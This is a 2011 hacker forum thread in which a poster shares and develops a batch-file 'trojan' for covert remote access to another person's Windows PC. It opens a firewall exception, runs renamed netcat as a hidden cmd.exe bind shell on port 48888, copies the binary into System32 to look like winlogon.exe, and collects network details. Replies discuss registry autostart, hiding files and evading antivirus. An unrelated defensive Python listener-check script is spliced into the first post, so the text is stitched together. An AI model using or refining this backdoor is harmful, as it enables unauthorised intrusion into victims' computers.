A bit o' mischief ;)

Posted: Sat Nov 12, 2011 2:38 pm
by GeorgeTI
Well, I was browsing through Liidian's post (http://www.hacker.org/forum/viewtopic.php?t=2379) and I thought it would be fun to freak someone out with it... a retard that thinks he knows about computers when he can't program his way out of a paper bag. So I came up with a bit of a "trojan", which isn't actually mine, but I modified it a bit... the code is from netcat's tutorials :)

Code:

echo off
cls
netsh firewall add allowedprogram winlog.exe winlog ENABLE
ipconfig /all > data.txt
start winlog.exe -d -l -p 48888 -e cmd.exe
copy winlog.exe C:\WINDOWS\System32
exit
As you sure have guessed, winlog.exe is nc.exe renamed :)

Legal stuff: This is for education / curiosity reasons ONLY. If you use it for illegal activities you are on your own and no one else but you is responsible.

My mods are to actually get nc to run in the background, and even bypass the Windows firewall if run from an admin shell.
I also extract the PC data to connect to it at my leisure (the concept is simple: plug in the USB memory stick, execute the file, unplug, leave) and copy it to system32 because regular users rarely ever touch this thing, and the renamed file looks totally legitimate there, alongside winlogon.exe :P which BTW is a Windows essential process and can't be terminated :D. Also, system32 is by default in the path, along with the windows directory, so I can execute it from everywhere on the PC. You get where I am going?
What this misses is the simple fact that I have to make it run every time the user starts the PC. I know that the obvious choice is the startup folder, but it is located in the user's personal folder, hence the problem: Is there any scripting adept out there who can enlighten me with the proper %what-should-I-put-here% thing, so I can just do:
copy StartEveryTime.bat %whatever%\startup ?
Also, I need another command to change the folder settings to NOT show hidden files. That way he/she won't ever take notice :P.
For now I have to do both of the aforementioned actions manually. So today I ask the help from any mischievous script guru and enthusiast.
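From the defender's side, the scheme described in this post has two observable traits: a listener on an unusual port, and a binary whose name imitates a Windows component (winlog.exe next to winlogon.exe). The check below is an added example, not code from the thread; the netstat/tasklist text is constructed, and EXPECTED_PORTS and LEGIT_NAMES are assumed, deliberately short allowlists.

```python
"""Flag listening sockets owned by lookalike-named or unexpected processes."""
import re

# Constructed sample in the layout of `netstat -ano` output (not a real capture).
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:48888          0.0.0.0:0              LISTENING       1592
  TCP    192.168.1.10:1043      10.0.0.5:80            ESTABLISHED     2204
"""

# Constructed PID -> image name mapping, as `tasklist` would report it.
TASKLIST_SAMPLE = {884: "svchost.exe", 4: "System", 1592: "winlog.exe", 2204: "iexplore.exe"}

# Assumed short allowlists: Windows binaries commonly imitated, and ports a
# plain XP box is expected to listen on. Tune both for a real environment.
LEGIT_NAMES = {"winlogon.exe", "svchost.exe", "csrss.exe", "lsass.exe", "services.exe", "explorer.exe"}
EXPECTED_PORTS = {135, 139, 445}

LINE_RE = re.compile(r"^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def edit_distance(a, b):
    """Levenshtein distance; small distances mean a name imitates a system binary."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(name):
    """Return the legitimate binary `name` resembles (distance 1..3), else None."""
    low = name.lower()
    if low in LEGIT_NAMES:
        return None
    best = min(LEGIT_NAMES, key=lambda n: edit_distance(low, n))
    return best if edit_distance(low, best) <= 3 else None


def suspicious_listeners(netstat_text, tasklist):
    """Return (port, pid, image, reason) tuples for listeners that need review."""
    findings = []
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header, UDP and non-listening rows are skipped
        port, pid = int(m.group(1)), int(m.group(2))
        image = tasklist.get(pid, "<unknown>")
        reasons = [f"unexpected port {port}"] if port not in EXPECTED_PORTS else []
        like = lookalike_of(image)
        if like:
            reasons.append(f"name resembles {like}")
        if reasons:
            findings.append((port, pid, image, "; ".join(reasons)))
    return findings
```

On the constructed sample only the port 48888 listener is reported, with both reasons attached.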

Posted: Sat Nov 12, 2011 11:04 pm
by MindFreakz
Besides the startup folder, there is another, more hidden, way to auto-start in Windows: the registry.

http://www.doshelp.com/HowToView/Registry_Keys.htm


This has a couple of advantages:
- It is user independent.
- It's more hidden. Everybody knows the startup-folder; the registry key is less known and harder to look up.
- You don't have to turn off showing hidden files.


I'm not quite sure if it is possible to add a reg-key from a .bat script; but you can always write a program to do this.

Posted: Sat Nov 12, 2011 11:26 pm
by GeorgeTI
Well, I didn't consider the registry from the very beginning, for the same reasons that I want this to go that way: it can be traced by the PC with various programs, and it is way more suspicious in automated scans. Besides, most computers only have one user, and that user has administrator rights. But hat tip to you about that, the link is useful for other stuff too, maybe I'll need it to edit other things to make the program run smoother, like disabling the commercial firewalls or something (I'll have to research on that one).
The point here is to create a waiting listening port and get enough data to connect to it. (I think I'll try to make a reverse-bind edition a bit later, depending on my schedule.) There can be many things that go wrong, like a hardware firewall or a commercial firewall, or even another OS (this one is tried successfully on a Windows XP SP 2 & 3 box ONLY!). The point here is to make it as stealthy to as many detectors as possible. Usually when editing the registry, things can go bananas quite easily (EVERY time you edit the registry, you are advised to keep a backup) and if there is an antivirus running it can set off bells (along with a nasty and attention-getting beep) and freeze the whole process. That risk is the reason I decided to go about it more conventionally. Just create an exception on the XP firewall, run nc to listen on port 48888, and wait, in the background. If I just copy a batch file into the startup folder (or even replace an existing one - hmmmm, this is a good idea, it adds some extra stealth :twisted: ) and netcat renamed, the antivirus doesn't have any reason to go off. Editing the registry, ESPECIALLY in the startup section, is the de facto signature of malware.
Anyway, your opinion is appreciated, I will try to experiment down that road, but I have to say I don't expect much at the end of that tunnel.

Re: A bit o' mischief ;)

Posted: Wed Nov 16, 2011 11:45 pm
by Liidian
Sorry, I was retarded and wrote something stupid because I did not fully understand the post itself. I take all accusations of being retarded in this case because I truly was, sorry.

Posted: Thu Nov 17, 2011 4:37 am
by GeorgeTI
Mr. Liidian, with this kind of excessive trolling it is no wonder you get flamed and taken as a "retard" as you say it. Also, your posts tend to be especially unproductive ones, with this one being a very good example. Also, my "bullshit" post is something I did in my free time just for *education* purposes, so if you just can't get that into your head, then there is really no point in further explaining the already obvious.
Also, please remind me of when I actually called YOU a "retard". If you had actually READ my first post then you would SURELY understand that
Well, I was browsing through Liidian's post (http://www.hacker.org/forum/viewtopic.php?t=2379) and I thought it would be fun to freak someone out with it... a retard that thinks he knows about computers when he can't program his way out of a paper bag.
That's right, the retard is the one to get freaked out, not you. Ooooh, the obvious revelation.
And no, I am not going to report your post, I will just let it stand there as a memorial of how you speak before you think (or read in this case). Don't just skim read, read the damn details. Also, throwing "challenges" not only betrays childish behavior, but is also attracting loads of flames. If you felt insulted, you could just PM me and we could talk this out like civilized people (yea, it works this way too) but you chose to just post your flame here and throw something that offends many people. Reeeeeal smart and mature move.

And of course you could just figure out that this very post was made inspired by *your* script, so the chance to actually mock you was quite small? It seems I was mistaken about you, Mr. Liidian, so unless you have come here to share some of your 5-year knowledge in certain scripting language, stop trolling and flaming and be quiet.

P.S. To everyone else, I apologize for my language on this post, but I surely hope you understand the circumstances.

Posted: Thu Nov 17, 2011 11:24 am
by Liidian
GeorgeTI wrote:
That's right, the retard is the one to get freaked out, not you.
Oh, I'm sorry, now this is really embarrassing. Sigh....
I am really, with all my heart, sorry I didn't look at what post you linked; I just thought you tried flaming me about infecting computers with trojans etc., where everyone flamed me. I am truthfully sorry and I'll keep my mouth shut. :< I'll delete my post btw..

Edit: this is extremely stupid; from now on I'll read everything to its full content without thinking I know what it is going to say. I hope you can forgive me GeorgeTI....

Posted: Thu Nov 17, 2011 9:04 pm
by GeorgeTI
Apology accepted. Now on to the pressing matter, shall we?
I found out how to actually hide the file, now what I need is a way to actually run a few more goodies in the background.
I think of running netcat in both a listen and a connecting manner. That way, if you have preset your computer, you can just come there and the connection will already be in place, waiting for you ^^.
I just need to do some research - the [updated] script seems to work well on Windows XP environments, or even some Vista systems, but it needs a lot of tweaking to get things done. I also need to find the registry key to set the command prompt window to fullscreen for the maximum laughs.
Does anyone know that specific key? Much obliged.
Another good old trick is to make the thing beep like hell, for maximum effect :P a nice screaming sound will do nicely, but I haven't dug into the beep command hard enough for that.
Anyway, I intend to publish this here once it is finished, or publish the url where it is hosted - who knows, it may even become a popular prank (^^)V

The thingy is completed!

Posted: Wed Jan 18, 2012 9:09 pm
by GeorgeTI
Seems this little idea got me down a dark path, for the final thing that I made was a heck of a lot more blackhat, a heck of a lot more dangerous and a heck of a lot more damaging.
Still it was fun.
Anyway, I decided to host it at another site, as it isn't something innocent now...